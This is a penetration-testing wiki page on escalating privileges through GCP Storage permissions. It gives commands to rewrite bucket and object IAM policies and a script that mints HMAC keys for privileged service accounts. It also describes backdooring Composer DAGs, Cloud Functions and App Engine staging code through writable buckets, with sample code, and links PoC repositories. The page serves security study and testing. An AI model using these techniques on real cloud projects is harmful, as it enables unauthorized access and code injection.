GCP - Storage Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Storage

Basic Information:

GCP - Storage Enum

storage.objects.get

This permission allows you to download files stored in Cloud Storage. It can potentially let you escalate privileges because, in some cases, sensitive information is stored there. Moreover, some GCP services store their information in buckets:

  • GCP Composer: When you create a Composer Environment, the code of all the DAGs is saved in a bucket. These tasks might contain interesting information inside their code.
  • GCR (Container Registry): The container images are stored inside buckets, which means that if you can read the buckets you will be able to download the images and search for leaks and/or source code.
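With this permission, objects can be fetched with `gcloud storage cp gs://<BUCKET>/<OBJECT> .` or directly through the JSON API with an OAuth access token. A minimal sketch of building the direct-download URL (bucket and object names below are hypothetical):

```python
import urllib.parse

def object_download_url(bucket: str, obj: str) -> str:
    """Build the JSON API media-download URL for an object.
    The object name must be URL-encoded, including slashes."""
    return ("https://storage.googleapis.com/storage/v1/b/"
            f"{bucket}/o/{urllib.parse.quote(obj, safe='')}?alt=media")

# Fetch this URL with an "Authorization: Bearer <ACCESS_TOKEN>" header
print(object_download_url("my-composer-bucket", "dags/pipeline.py"))
# https://storage.googleapis.com/storage/v1/b/my-composer-bucket/o/dags%2Fpipeline.py?alt=media
```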

storage.objects.setIamPolicy

It can allow you to abuse any of the previous scenarios in this section.

# Add binding
gcloud storage objects add-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role="<ROLE>" \
--project=<PROJECT_ID>

# Remove binding
gcloud storage objects remove-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role="<ROLE>" \
--project=<PROJECT_ID>

# Change Policy
gcloud storage objects set-iam-policy gs://<BUCKET_NAME>/<OBJECT_NAME> - \
--project=<PROJECT_ID> <<'POLICY'
{
"bindings": [
{
"role": "<ROLE>",
"members": [
"<MEMBER_TYPE>:<MEMBER_IDENTIFIER>"
]
}
]
}
POLICY
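Under the hood, `add-iam-policy-binding` reads the current policy, merges the member into the binding for the given role and writes the policy back. A minimal sketch of that client-side merge, with a hypothetical role and member:

```python
def add_binding(policy: dict, role: str, member: str) -> dict:
    """Merge `member` into the binding for `role`, creating the binding
    if it does not exist (what add-iam-policy-binding does client-side)."""
    for binding in policy.setdefault("bindings", []):
        if binding["role"] == role:
            if member not in binding["members"]:
                binding["members"].append(member)
            return policy
    policy["bindings"].append({"role": role, "members": [member]})
    return policy

policy = {"bindings": []}
add_binding(policy, "roles/storage.objectViewer", "user:attacker@example.com")
print(policy)
```

The same get-modify-set cycle is what `set-iam-policy` performs in one shot, which is why it can also silently remove existing bindings.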

storage.buckets.setIamPolicy

For an example showing how to modify permissions with this permission, check this page:

# Add binding
gcloud storage buckets add-iam-policy-binding gs://<MY_BUCKET> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role=<ROLE> \
--project=<MY_PROJECT>

# Remove binding
gcloud storage buckets remove-iam-policy-binding gs://<MY_BUCKET> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role=<ROLE> \
--project=<MY_PROJECT>

# Change policy
gcloud storage buckets set-iam-policy gs://<BUCKET_NAME> - \
--project=<PROJECT_ID> <<'POLICY'
{
"bindings": [
{
"role": "<ROLE>",
"members": [
"<MEMBER_TYPE>:<MEMBER_IDENTIFIER>"
]
}
]
}
POLICY

GCP - Public Buckets Privilege Escalation

storage.hmacKeys.create

Cloud Storage's "interoperability" feature, designed for cross-cloud interactions such as with AWS S3, involves the creation of HMAC keys for Service Accounts and users. An attacker can exploit this by generating an HMAC key for a Service Account with elevated privileges, thereby escalating privileges within Cloud Storage. While user-associated HMAC keys are only retrievable via the web console, their access and secret keys remain permanently accessible there, allowing them to be stored as backup access. Conversely, Service Account-linked HMAC keys are accessible via the API, but their access and secret keys are not retrievable after creation, which makes continuous access more complicated.

# Create key
gsutil hmac create <sa-email> # You might need to execute this inside a VM instance

## If you have TROUBLE creating the HMAC key this way, you can also do it by contacting the API directly:
import requests
import json

PROJECT_ID = '$PROJECT_ID'
TARGET_SERVICE_ACCOUNT = f"storage-sa@{PROJECT_ID}.iam.gserviceaccount.com"
ACCESS_TOKEN = "$CLOUDSDK_AUTH_ACCESS_TOKEN"

key = requests.post(
    f'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',
    params={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}
).json()
#print(json.dumps(key, indent=4))
print(f'ID: {key["metadata"]["accessId"]}')
print(f'Secret: {key["secret"]}')


# Configure gsutil to use the HMAC key
gcloud config set pass_credentials_to_gsutil false
gsutil config -a

# Use it
gsutil ls gs://[BUCKET_NAME]

# Restore
gcloud config set pass_credentials_to_gsutil true

Another exploit script for this method can be found here.
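Once you have an HMAC key pair, requests to the XML API can be signed S3-style; `gsutil config -a` (above) or any S3-compatible client pointed at storage.googleapis.com handles this for you. For reference, a minimal sketch of the legacy V2-style signature (Base64 of HMAC-SHA1 over the string-to-sign), using made-up placeholder credentials:

```python
import base64
import hashlib
import hmac
import time

def sign_v2(secret: str, method: str, resource: str, expires: int) -> str:
    """Compute the legacy signature: Base64(HMAC-SHA1(secret, string_to_sign))."""
    string_to_sign = f"{method}\n\n\n{expires}\n{resource}"
    digest = hmac.new(secret.encode(), string_to_sign.encode(), hashlib.sha1).digest()
    return base64.b64encode(digest).decode()

# Hypothetical values: sign a GET for /my-bucket/flag.txt valid for 5 minutes
expires = int(time.time()) + 300
sig = sign_v2("FAKE_SECRET_KEY", "GET", "/my-bucket/flag.txt", expires)
print(sig)  # URL-encode this and pass it as the Signature query parameter
```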

storage.objects.create, storage.objects.delete = Storage Write permissions

In order to create a new object inside a bucket you need storage.objects.create and, according to the docs, you also need storage.objects.delete to modify an existing object.

A very common way to exploit write access to a bucket is when the bucket stores web server files: you might be able to store new code that will be used by the web application.
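With these permissions an object can be overwritten via the JSON API's simple-upload endpoint (POST the file bytes with a Bearer token). A sketch of building that upload URL, with hypothetical bucket and object names:

```python
import urllib.parse

def upload_url(bucket: str, name: str) -> str:
    """JSON API simple-upload endpoint; POST the new file contents here
    with an "Authorization: Bearer <ACCESS_TOKEN>" header."""
    return ("https://storage.googleapis.com/upload/storage/v1/b/"
            f"{bucket}/o?uploadType=media&name={urllib.parse.quote(name, safe='')}")

print(upload_url("webapp-assets", "static/app.js"))
# https://storage.googleapis.com/upload/storage/v1/b/webapp-assets/o?uploadType=media&name=static%2Fapp.js
```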

Composer

Composer is Apache Airflow managed inside GCP. It has several interesting features:

  • It runs inside a GKE cluster, so the SA the cluster uses is accessible to the code running inside Composer
  • All the components of a Composer environment (DAG code, plugins and data) are stored inside a GCP bucket. If an attacker has read and write permissions over it, they could monitor the bucket and, whenever a DAG is created or updated, submit a backdoored version so the Composer environment fetches the backdoored version from storage.

You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs
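The monitoring step of that attack boils down to polling the bucket's object listing and reacting when a DAG is new or its generation number changes. A minimal sketch of the change-detection logic (object names and generations below are made up):

```python
def changed_objects(before: dict, after: dict) -> set:
    """Given two {object_name: generation} listings of the dags/ prefix,
    return the names of objects that are new or were overwritten."""
    return {name for name, gen in after.items() if before.get(name) != gen}

before = {"dags/etl.py": "1700000000000001"}
after = {"dags/etl.py": "1700000000000002", "dags/new.py": "1700000000000003"}
print(sorted(changed_objects(before, after)))
# ['dags/etl.py', 'dags/new.py'] -> re-upload backdoored versions of these
```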

Cloud Functions

  • Cloud Functions code is stored in Storage: whenever a new version is created the code is pushed to the bucket and the new container is built from that code. Therefore, by overwriting the code before the new version gets built, it's possible to make the cloud function execute arbitrary code.

You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions

App Engine

App Engine versions generate some data inside a bucket named staging.<project-id>.appspot.com. Inside this bucket, it's possible to find a folder called ae that contains a folder per version of the App Engine app, and inside these folders it's possible to find the manifest.json file. This file contains JSON listing all the files that must be used to create the specific version. Moreover, it's possible to find the real names of the files, their URLs inside the GCP bucket (the files inside the bucket are renamed to their SHA-1 hash) and the SHA-1 hash of each file.
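Since staged files are stored under their SHA-1 hash, crafting a consistent manifest entry for a replacement file just requires hashing its content. A sketch of that idea; the field names (sourceUrl, sha1Sum) follow the App Engine versions API file manifest and may differ slightly from the staged manifest.json, and the bucket/file names are hypothetical:

```python
import hashlib
import json

def manifest_entry(bucket: str, path: str, content: bytes) -> dict:
    """Build a manifest-style entry pointing at the SHA-1-named blob
    that `content` would be staged as."""
    sha1 = hashlib.sha1(content).hexdigest()
    return {path: {
        "sourceUrl": f"https://storage.googleapis.com/{bucket}/{sha1}",
        "sha1Sum": sha1,
    }}

entry = manifest_entry("staging.my-project.appspot.com", "main.py",
                       b"import os; os.system('id')")
print(json.dumps(entry, indent=2))
```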

Note that it’s not possible to pre-takeover this bucket because GCP users aren’t authorized to generate buckets using the domain name appspot.com.

However, with read & write access over this bucket, it’s possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and any time a change is performed (new version), modify the new version as fast as possible. This way, the container that gets created from this code will execute the backdoored code.

The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the staging.<project-id>.appspot.com bucket:

  • Upload the complete new code of the App Engine version to a different, available bucket and prepare a manifest.json file with the new bucket name and the SHA-1 hashes of the files. Then, when a new version is created inside the bucket, you just need to modify the manifest.json file and upload the malicious one.
  • Upload a modified requirements.txt version that pulls in malicious dependency code and update the manifest.json file with the new filename, its URL and its hash.
  • Upload a modified main.py or app.yaml file that will execute the malicious code and update the manifest.json file with the new filename, its URL and its hash.

You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-AppEngine

GCR

  • Google Container Registry stores the images inside buckets; if you can write to those buckets you might be able to move laterally to wherever those images are being run.
  • The bucket used by GCR will have a URL similar to gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com (The top level subdomains are specified here).

Tip

This service is deprecated, so this attack is no longer useful. Moreover, Artifact Registry, the service that replaces it, doesn't store the images in buckets.
